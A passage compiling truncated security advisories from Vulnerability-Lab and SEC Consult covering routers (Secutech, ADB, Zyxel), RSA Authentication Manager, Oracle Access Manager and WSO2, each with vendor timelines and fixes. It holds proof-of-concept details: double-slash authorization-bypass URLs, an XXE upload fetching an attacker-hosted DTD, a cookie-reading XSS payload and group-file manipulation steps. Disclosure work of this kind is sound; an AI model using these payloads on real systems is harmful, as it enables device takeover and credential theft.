damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_labfacebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistr
Secutech DSL WR RIS 330 - Filter Bypass Vulnerability
:language=en Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 131 MACC==advance.asp_time=1477567396.02=3_type=2=Lawrence%40connecy.au=hivulnerable=7331 RESPONSE- HTTP/1.0 302 Redirect Server: GoAhead-Webs Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Location: http://localhost/notice.asp This document has moved to a new http://localhost/notice.asp;>location. Please update your documents to reflect the new location. Solution - Fix & Patch: === The vulnerability can be patched by a restriction and approval of the affected key parameter in the POST method request. Disallow to save any input less then 8 characters to permanently grant the security of the customer using the mentioned hardware. Security Risk: == The security risk of the filter bypass router vulnerability in the password setup module is estimated as medium (CVSS 3.3). Credits & Authors: ====== Lawrence Amer (Vulnerability Lab Core Research Team) [zeroat...@gmail.com] - https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
SEC Consult SA-20180704-2 :: Privilege escalation via linux group manipulation in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities as they have been split up for better readability: Local root: https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/ Authorization bypass: https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/ SEC Consult Vulnerability Lab Security Advisory < 20180704-2 > === title: Privilege escalation via linux group manipulation product: All ADB Broadband Gateways / Routers (based on Epicentro platform) vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc. fixed version: see "Solution" section below CVE number: CVE-2018-13110 impact: critical homepage: http://www.adbglobal.com found: 2016-07-11 by: Stefan Viehböck (Office Vienna) Johannes Greil (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies." Source: https://www.adbglobal.com/about-adb/ "Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions." Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast Business recommendation: By exploiting the group manipulation vulnerability on affected and unpatched devices an attacker is able to gain access to the command line interface (CLI) if previously disabled by the ISP. Depending on the feature-set of the CLI (ISP dependent) it is then possible to gain access to the whole configuration and manipulate settings in the web GUI and escalate privileges to highest access rights. It is highly recommended by SEC Consult to perform a thorough security review by security professionals for this platform. It is assumed that further critical vulnerabilities exist within the firmware of this device. Vulnerability overview/description: --- 1) Privilege escalation via linux group manipulation (CVE-2018-13110) An attacker with standard / low access rights within the web GUI is able to gain access to the CLI (if it has been previously disabled by the configuration) and escalate his privileges. Depending on the CLI features it is possible to extract the whole configuration and manipulate settings or gain access to debug features of the device, e.g. via "debug", "upgrade", "upload" etc. commands in the CLI. Attackers can gain access to sensitive configuration data such as VoIP credentials or other information and manipulate any settings of the device. Proof of concept: - 1) Privilege escalation via linux group manipulation (CVE-2018-13110) It is possible to manipulate the group name setting of "Storage users" and overwrite the local linux groups called "remoteaccess" or "localaccess" in (in /etc/group) which define access to Telnet or SSH on the ADB devices. It may be possible to overwrite the "root" group as well but it may brick the device and the default user is already within the "root" group. Hence this attack has not been further tested. The following steps describe the attack: a) Add a new group called "localaccess" via the web GUI here: http://$IP/ui/dboard/storage/storageusers?backto=storage This will generate the following new group in /etc/group. The original "localaccess" group will overwritten. localaccess:Storage Group:5001: b) Then delete this group via the web GUI again, the entry will be removed from /etc/group completely. c) Afterwards, create the following new group name entry via the web GUI and add your user account (e.g. admin) wh
SEC Consult SA-20180704-1 :: Authorization Bypass in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities as they have been split up for better readability: Local root: https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/ Privilege escalation: https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/ SEC Consult Vulnerability Lab Security Advisory < 20180704-1 > === title: Authorization Bypass product: All ADB Broadband Gateways / Routers (based on Epicentro platform) vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc. fixed version: see "Solution" section below CVE number: CVE-2018-13109 impact: critical homepage: http://www.adbglobal.com found: 2016-06-28 by: Johannes Greil (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies." Source: https://www.adbglobal.com/about-adb/ "Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions." Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast Business recommendation: By exploiting the authorization bypass vulnerability on affected and unpatched devices an attacker is able to gain access to settings that are otherwise forbidden for the user, e.g. through strict settings set by the ISP. It is also possible to manipulate settings to e.g. enable the telnet server for remote access if it had been previously disabled by the ISP. The attacker needs some user account, regardless of the permissions, for login, e.g. the default one provided by the ISP or printed on the device can be used. It is highly recommended by SEC Consult to perform a thorough security review by security professionals for this platform. It is assumed that further critical vulnerabilities exist within the firmware of this device. Vulnerability overview/description: --- 1) Authorization bypass vulnerability (CVE-2018-13109) Depending on the firmware version/feature-set of the ISP deploying the ADB device, a standard user account may not have all settings enabled within the web GUI. An authenticated attacker is able to bypass those restrictions by adding a second slash in front of the forbidden entry of the path in the URL. It is possible to access forbidden entries within the first layer of the web GUI, any further subsequent layers/paths (sub menus) were not possible to access during testing but further exploitation can't be ruled out entirely. Proof of concept: - 1) Authorization bypass vulnerability (CVE-2018-13109) Assume the following URL is blocked/forbidden within the web GUI settings: http://$IP/ui/dboard/settings/management/telnetserver Adding a second slash in front of the blocked entry "telnetserver" will enable full access including write permissions to change settings: http://$IP/ui/dboard/settings/management//telnetserver This works for many other settings within the web GUI! In our tests it was not possible to access subsequent layers, e.g.: Assume that both the proxy menu and submenu "rtsp" settings are blocked, a second slash will _not_ enable access to the RTSP settings: http://$IP/ui/dboard/settings/proxy//rtsp Nevertheless, it can't be ruled out that sub menus can be accessed too when further deeper tests are being performed. Vulnerable / tested versions: - The following devices & firmware have been tested which were the most recent versions at the time of discovery: The firmware versions depend on the ISP / customer of ADB and may vary! ADB P.RG AV4202N - E_
SEC Consult SA-20180704-0 :: Local root jailbreak via network file sharing flaw in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities as they have been split up for better readability: Authorization bypass: https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/ Privilege escalation: https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/ SEC Consult Vulnerability Lab Security Advisory < 20180704-0 > === title: Local root jailbreak via network file sharing flaw product: All ADB Broadband Gateways / Routers (based on Epicentro platform) vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc. fixed version: see "Solution" section below CVE number: CVE-2018-13108 impact: critical homepage: http://www.adbglobal.com found: 2016-06-09 by: Johannes Greil (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies." Source: https://www.adbglobal.com/about-adb/ "Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions." Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast Business recommendation: By exploiting the local root vulnerability on affected and unpatched devices an attacker is able to gain full access to the device with highest privileges. Attackers are able to modify any settings that might have otherwise been prohibited by the ISP. It is possible to retrieve all stored user credentials (such as VoIP) or SSL private keys. Furthermore, attacks on the internal network side of the ISP are possible by using the device as a jump host, depending on the internal network security measures. Network security should not depend on the security of independent devices, such as modems. An attacker with root access to such a device can enable attacks on connected networks, such as administrative networks managed by the ISP or other users. It is highly recommended by SEC Consult to perform a thorough security review by security professionals for this platform. It is assumed that further critical vulnerabilities exist within the firmware of this device. Vulnerability overview/description: --- 1) Local root jailbreak via network file sharing flaw (CVE-2018-13108) Most ADB devices offer USB ports in order for customers to use them for printer or file sharing. In the past, ADB devices have suffered from symlink attacks e.g. via FTP server functionality which has been fixed in more recent firmware versions. The "Network File Sharing" feature of current ADB devices via USB uses a samba daemon which accesses the USB drive with highest access rights and exports the network shares with root user permissions. The default and hardcoded setting for the samba daemon within the smb.conf on the device has set "wide links = no" which normally disallows gaining access to the root file system of the device using symlink attacks via a USB drive. But an attacker is able to exploit both a web GUI input validation and samba configuration file parsing problem which makes it possible to access the root file system of the device with root access rights via a manipulated USB drive. The attacker can then edit various system files, e.g. passwd and session information of the web server in order to escalate web GUI privileges and start a telnet server and gain full system level shell access as root. This is a local attack and not possible via remote access vectors as an attacker needs to insert a specially crafted USB drive into the device! Usually not even the ISPs themselves have direct root access on ADB devices hence this attack is quite p
SEC Consult SA-20180516-0 :: XXE & XSS vulnerabilities in RSA Authentication Manager
SEC Consult Vulnerability Lab Security Advisory < 20180516-0 > === title: XXE & XSS vulnerabilities product: RSA Authentication Manager vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1 fixed version: 8.3 P1 and later CVE number: CVE-2018-1247 impact: High homepage: https://www.rsa.com found: 2017-11-16 by: Mantas Juskauskas (Office Vilnius) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "RSA provides more than 30,000 customers around the world with the essential security capabilities to protect their most valuable assets from cyber threats. With RSA's award-winning products, organizations effectively detect, investigate, and respond to advanced attacks; confirm and manage identities; and ultimately, reduce IP theft, fraud, and cybercrime." Source: https://www.rsa.com/en-us/company/about Business recommendation: By exploiting the vulnerabilities documented in this advisory an attacker can obtain sensitive information from the RSA Authentication Manager file system, initiate arbitrary TCP connections or cause DoS. In addition to this, clients of the RSA Authentication manager can be affected by exploiting client-side issues. SEC Consult recommends to apply the available patches from the vendor. Vulnerability overview/description: --- 1) XML External Entity Injection (XXE) (CVE-2018-1247) The used XML parser is resolving XML external entities which allows an authenticated attacker (or an attacker that is able to trick an authenticated user into importing malicious XML files) to read files, send requests to systems on the internal network (e.g port scanning) or cause a DoS (e.g. billion laughs attack). This issue has been fixed by RSA as described in the advisory DSA-2018-086. (http://seclists.org/fulldisclosure/2018/May/18) 2) Cross-site Flashing The vulnerable flash file does not filter or escape the user input sufficiently. This leads to a reflected cross-site scripting vulnerability. With reflected cross-site scripting, an attacker can inject arbitrary HTML or JavaScript code into the victim's web browser. Once the victim clicks a malicious link the attacker's code is executed in the context of the victim's web browser. The vulnerability exists in a third party component called pmfso. This issue has been fixed by RSA as described in the advisory DSA-2018-082. 3) DOM based Cross-site Scripting Several client-side scripts handle user supplied data with insufficient validation before storing it in the DOM. This issue can be exploited to cause reflected cross-site scripting. The identified issues exist in third party components. One of the affected components is PopCalendarX which has an assigned CVE (CVE-2017-9072). This issue has been fixed by RSA as described in the advisory DSA-2018-082. Two further issues affecting other third party components are not yet fixed, as the third party vendor did not supply a patch to RSA yet. Proof of concept: - 1) XML External Entity Injection (XXE) (CVE-2018-1247) The Security Console of the RSA Authentication Manager allows authenticated users to import SecurID Token jobs in XML format. By importing an XML file with malicious XML code to the application, it is possible to exploit a blind XXE vulnerability within the application. For example, in order to read arbitrary files from the RSA Authentication Manager OS, the following malicious XML file can be imported via the affected endpoint: == POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1 Host: :7004 Cookie: [snip] [snip] -9721941626073 Content-Disposition: form-data; name="textImportFileName.theFile"; filename="xxe_test.xml" Content-Type: text/xml /a.dtd"> -9721941626073 Content-Disposition: form-data; name="textImportFileName.uploadResult" [snip] == In this case, the attacker has to host the defined a.dtd file in the web root of a controlled web server: == # cat /var/www/a.dtd :8080/%p1;'>"> %p2; == Assuming that the RSA Authentication Manager OS has network level access to the TCP port 80 and 8080 of th
Re: SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet
The following CVE numbers have been assigned now: XSS issue: CVE-2018-11090 Arbitrary File Upload: CVE-2018-11091 On 2018-05-14 13:25, SEC Consult Vulnerability Lab wrote: > SEC Consult Vulnerability Lab Security Advisory < 20180514-0 > > === > title: Arbitrary File Upload & Cross-site scripting > product: MyBiz MyProcureNet > vulnerable version: 5.0.0 > fixed version: unknown > CVE number: - > impact: Critical >homepage: http://www.mybiz.net/ > found: 2018-01-29 > by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur) > Fikri Fadzil (Office Singapore) > Wan Ikram (Office Kuala Lumpur) > Jasveer Singh (Office Kuala Lumpur) > SEC Consult Vulnerability Lab > > An integrated part of SEC Consult > Europe | Asia | North America > > https://www.sec-consult.com > > === > > Vendor description: > --- > "MyBiz is a company fixated on developing technology which transforms the way > business is done online. At the intersection of what one business needs from > another is the potential for value to be created differently. This > intersection for the exchange of value requires technology but in > fundamentally very different ways from traditional enterprise systems. MyBiz > believes that the chemistry of business is the business relationships between > enterprises. The strength of the business relationship drives the success and > future of the business. MyBiz believes that these business relationships need > to be captured and orchestrated. MyBiz developed our proprietary Business > Relationship Network engine, a platform to capture business relationships as > data to drive new business services which create value efficiently." > > Source: http://www.mybiz.net/copy-of-our-story > > > Business recommendation: > > The vendor did not reply to our inquiries since February 2018 hence the issues > might still exist in current versions. > > SEC Consult recommends not use this product until a thorough security review > has been performed by security professionals and all identified issues have > been resolved. It is assumed that MyBiz products are affected by further > critical security issues. > > > Vulnerability overview/description: > --- > The identified vulnerabilities can be exploited after authentication but > the registration for the application is usually open for anyone. > > 1. Arbitrary File Upload > A malicious file can be uploaded to the webserver by an attacker. It is > possible for an attacker to upload a script to issue operating system > commands. > > This vulnerability occurs because an attacker is able to adjust the > "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary > extensions to the whitelist during the upload. > > For instance, if the extension .asp is added to the > "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server > accepts "secctest.asp" as legitimate file. Hence malicious files can be > uploaded in order to execute arbitrary commands to take over the server. > > > 2. Reflected Cross-site scripting > This vulnerability within "ProxyPage.aspx" allows an attacker to inject > malicious client side scripting which will be executed in the browser of > users if they visit the manipulated site. > > > Proof of concept: > - > The proof of concept has been removed as no patch is available. > > > Vulnerable / tested versions: > - > MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable. > This > was the latest version available at the time of the test. > > > Vendor contact timeline: > > 2018-02-22: Contacting vendor through i...@mybiz.net (no response) > 2018-02-27: Request update from vendor (no response) > 2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us > (no response) > 2018-05-14: Public release of security advisory > > > Solution: > ----- > None > > > Workaround: > --- > None > > > Advisory URL: > - > https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html > > ~~~~~~~~
SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet
SEC Consult Vulnerability Lab Security Advisory < 20180514-0 > === title: Arbitrary File Upload & Cross-site scripting product: MyBiz MyProcureNet vulnerable version: 5.0.0 fixed version: unknown CVE number: - impact: Critical homepage: http://www.mybiz.net/ found: 2018-01-29 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur) Fikri Fadzil (Office Singapore) Wan Ikram (Office Kuala Lumpur) Jasveer Singh (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "MyBiz is a company fixated on developing technology which transforms the way business is done online. At the intersection of what one business needs from another is the potential for value to be created differently. This intersection for the exchange of value requires technology but in fundamentally very different ways from traditional enterprise systems. MyBiz believes that the chemistry of business is the business relationships between enterprises. The strength of the business relationship drives the success and future of the business. MyBiz believes that these business relationships need to be captured and orchestrated. MyBiz developed our proprietary Business Relationship Network engine, a platform to capture business relationships as data to drive new business services which create value efficiently." Source: http://www.mybiz.net/copy-of-our-story Business recommendation: The vendor did not reply to our inquiries since February 2018 hence the issues might still exist in current versions. SEC Consult recommends not use this product until a thorough security review has been performed by security professionals and all identified issues have been resolved. It is assumed that MyBiz products are affected by further critical security issues. Vulnerability overview/description: --- The identified vulnerabilities can be exploited after authentication but the registration for the application is usually open for anyone. 1. Arbitrary File Upload A malicious file can be uploaded to the webserver by an attacker. It is possible for an attacker to upload a script to issue operating system commands. This vulnerability occurs because an attacker is able to adjust the "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary extensions to the whitelist during the upload. For instance, if the extension .asp is added to the "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server accepts "secctest.asp" as legitimate file. Hence malicious files can be uploaded in order to execute arbitrary commands to take over the server. 2. Reflected Cross-site scripting This vulnerability within "ProxyPage.aspx" allows an attacker to inject malicious client side scripting which will be executed in the browser of users if they visit the manipulated site. Proof of concept: - The proof of concept has been removed as no patch is available. Vulnerable / tested versions: - MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable. This was the latest version available at the time of the test. Vendor contact timeline: 2018-02-22: Contacting vendor through i...@mybiz.net (no response) 2018-02-27: Request update from vendor (no response) 2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us (no response) 2018-05-14: Public release of security advisory Solution: - None Workaround: --- None Advisory URL: ----- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC C
SEC Consult SA-20180503-0 :: Authentication Bypass in Oracle Access Manager (OAM)
We have published an accompanying blog post to this technical advisory with further information: Blog: https://www.sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/ Demo video: https://www.youtube.com/watch?v=YK7_1NozAwQ SEC Consult Vulnerability Lab Security Advisory < 20180503-0 > === title: Authentication Bypass product: Oracle Access Manager vulnerable version: 11.1.2.3.0, 12.2.1.3.0 fixed version: April 2018 CPU CVE number: CVE-2018-2879 impact: Critical homepage: https://www.oracle.com/ found: 2017-11 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Oracle Access Management provides innovative new services that complement traditional access management capabilities. It not only provides Web SSO with MFA, coarse grained authorization and session management but also provides standard SAML Federation and OAuth capabilities to enable secure access to external cloud and mobile applications. It can be easily integrated with the Oracle Identity Cloud Service to support hybrid access management capabilities that can help customers to seamlessly protect on-premise and cloud applications and workloads." URL: http://www.oracle.com/technetwork/middleware/id-mgmt/index-090417.html Business recommendation: SEC Consult did not conduct a full security audit as only a cryptographic implementation was analyzed. However, since the vulnerability was found in such a central component of the OAM, we suspect that an insufficient amount of attention has been given to information security. Given the central position in an organization's security infrastructure, we recommend Oracle's customers to either conduct a full audit of the component or to request the results of such audits from Oracle. The security patches from the Oracle CPU April 2018 have to be applied immediately! Vulnerability overview/description: --- Due to an improper usage of the CBC encryption mode, Oracle Access Manager (OAM) is vulnerable to an authentication bypass vulnerability. An attacker can abuse this vulnerability to log in to any resource protected by the OAM using any user account, even administrative accounts! This security vulnerability completely breaks the main functionality of the OAM product. An attacker can create a scenario in which the OAM replies differently depending on whether the PKCS#7 padding of an encrypted message is valid or invalid. This behavior can be used to mount a padding oracle attack. An attacker can decrypt and encrypt several messages used to communicate between the OAM and web servers. The attack described here allows an attacker to create arbitrary authentication cookies which are accepted by the OAM. Proof of concept: - A successful user authentication with Oracle Access Manager (OAM) involves the following steps: 1. The user accesses a protected resource. 2. A component in the web server (the Oracle Webgate) answers this request with a redirect to the OAM. An encrypted message ("encquery") is passed to the OAM in a URL parameter. 3. The user authenticates against the OAM (e.g. with username and password). 4. The OAM redirects the user back to the web server. Information about the successful login is passed in the parameter "encreply". 5. The web server redirects the user to the resource that was initially requested. An encrypted authentication token is stored in a cookie (OAMAuthnCookie). 6. The authentication token in the OAMAuthnCookie cookie is used from now on to authenticate the user. All three encrypted messages (encquery, encreply, OAMAuthnCookie) are encrypted with a CBC cipher using the same key. This key is shared between the OAM and the web server. The attack exploits step 2 of the authentication process: the attacker sends manipulated "encquery" parameters and observes the server's response. The following shows an example of a decrypted encquery: salt=sF/vMVV0Gkr/k+IhbrXYWg== wh=agentid wu=%2F wo=1 rh=http://server: ru=%2F reqtime=151000 ctx= validate= where * the "salt" is a randomly generated value * "validate" is a hash over certain parts of the message (MD5) To conduct a padding oracle attack, an attacker would modify the second last encrypted block of an encrypted message. Most of the time, this causes the padding in the decrypted message to be invalid. In case the padding is accepted, the attacker gains information about the p
SEC Consult SA-20180424-0 :: Reflected Cross-Site Scripting in multiple Zyxel ZyWALL products
SEC Consult Vulnerability Lab Security Advisory < 20180424-0 > === title: Reflected Cross-Site Scripting product: Zyxel ZyWALL: see "Vulnerable / tested version" vulnerable version: ZLD 4.30 and before fixed version: ZLD 4.31 CVE number: - impact: Medium homepage: https://www.zyxel.com found: 2018-02-05 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Focused on innovation and customer-centricity, Zyxel Communications Corp. has been connecting people to the internet for nearly 30 years. We keep promoting creativity which meets the needs of customers. This spirit has never been changed since we developed the world's first integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and innovate with networking technology places us at the forefront of understanding connectivity for telco/service providers, businesses and home users. We're building the networks of tomorrow, helping unlock the world's potential and meeting the needs of the modern workplace; powering people at work, life and play. We stand side-by-side with our customers and partners to share new approaches to networking that will unleash their abilities. Loyal friend, powerful ally, reliable resource — we are Zyxel, Your Networking Ally." Source: https://www.zyxel.com/about_zyxel/company_overview.shtml Business recommendation: SEC Consult recommends Zyxel customers to upgrade the firmware to the latest version available. A thorough security review should be performed by security professionals to identify further potential security issues. Vulnerability overview/description: --- 1) Reflected Cross-Site Scripting (XSS) A reflected cross-site scripting vulnerability was identified in 'free_time_failed.cgi' in the admin interface. The parameter 'err_msg' is returned without any sanitization of the input. An attacker, for example, can exploit this vulnerability to steal cookies from the attacked user in order to hijack a session and gain access to the device. Proof of concept: - 1) Reflected Cross-Site Scripting (XSS) By opening the following link, contents of the 'arip' and 'zy_pc_browser' cookies will be displayed. http:///free_time_failed.cgi?err_msg=alert(document.cookie); https:///free_time_failed.cgi?err_msg=alert(document.cookie); Vulnerable / tested versions: - The following versions are affected: Zyxel ZyWall USG 110 ZLD 4.30 and earlier Zyxel ZyWall USG 210 ZLD 4.30 and earlier Zyxel ZyWall USG 310 ZLD 4.30 and earlier Zyxel ZyWall USG 1100 ZLD 4.30 and earlier Zyxel ZyWall USG 1900 ZLD 4.30 and earlier Zyxel ZyWall USG 2200-VPN ZLD 4.30 and earlier Vendor contact timeline: 2018-02-07: Contacting vendor through secur...@zyxel.com.tw 2018-02-08: Vendor responded with contact information and a PGP key. Sent the encrypted advisory to the contact. 2018-02-09: Contact confirmed that the advisory was received. 2018-02-16: Contact confirmed the vulnerability and stated that the ZyWALL series is vulnerable to the reported vulnerability. The contact also stated that the vulnerability will be fixed until the end of March. Requested more information regarding version numbers and other affected devices. 2018-02-23: Contact confirmed that the devices are vulnerable in firmware version 4.30 and before. 2018-03-21: Contact informed us that the new firmware version will be ZLD 4.31 and that it will be released on 2018-04-17. Shifted release of advisory to 2018-04-17. 2018-04-12: Informed the contact that the advisory will be released in few days. 2018-04-17: Asked the vendor if ZLD 4.31 was released. Didn't find the new version on the customer portal. E-mail was blocked and returned. 2018-04-18: Found the new version (ZLD 4.31) on the customer portal. 2018-04-24: Advisory release. Solution: - Install firmware version ZLD 4.31 from the vendor's website to fix this issue: https://www.zyxel.com/support/download_landing.shtml Workaround: --- Restrict network access to the device. Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC
SEC Consult SA-20180423-0 :: Multiple Stored XSS Vulnerabilities in WSO2 Carbon and Dashboard Server
SEC Consult Vulnerability Lab Security Advisory < 20180423-0 > === title: Multiple Stored XSS Vulnerabilities product: WSO2 Carbon, WSO2 Dashboard Server vulnerable version: WSO2 Identity Server 5.3.0 fixed version: WSO2 Identity Server 5.5.0 CVE number: CVE-2018-8716 impact: high homepage: https://wso2.com/products/dashboard found: 2017-12-13 by: W. Schober (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "WSO2 Carbon redefines middleware by providing an integrated and componentized middleware platform that adapts to the specific needs of any enterprise IT project - on premise or in the cloud. 100% open source and standards-based, WSO2 Carbon enables developers to rapidly orchestrate business processes, compose applications and develop services using WSO2 Developer Studio and a broad range of business and technical services that integrate with legacy, packaged and SaaS applications. The lean, complete, OSGi-based platform includes more than 175 components – OSGi bundles or Carbon features. The WSO2 Carbon core framework functions as “Eclipse for servers” and includes common capabilities shared by all WSO2 products, such as built-in registry, user management, transports, security, logging, clustering, caching and throttling services, co-ordination, and a GUI framework." Source: https://wso2.com/products/carbon/ "The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to rapidly create visually appealing and engaging web components such as dashboards, and gadgets, and unlocking data for business intelligence and monitoring. With the host of capabilities that Dashboard Server provides out-of-the-box, going from data to screen has never been easier." Source: https://wso2.com/products/dashboard-server/ Business recommendation: SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Vulnerability overview/description: --- 1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716) The dashboard is used by the end-users to manage their accounts, change passwords, alter their profiles, or change certain settings. An attacker is able to inject arbitrary JavaScript payloads into various textboxes (username, home address, lastname, firstname, etc). The payloads are permanently stored in the dashboard and triggered every time the dashboard is visited. The payload is also potentially triggered in the carbon part of WSO2, which means that an attacker 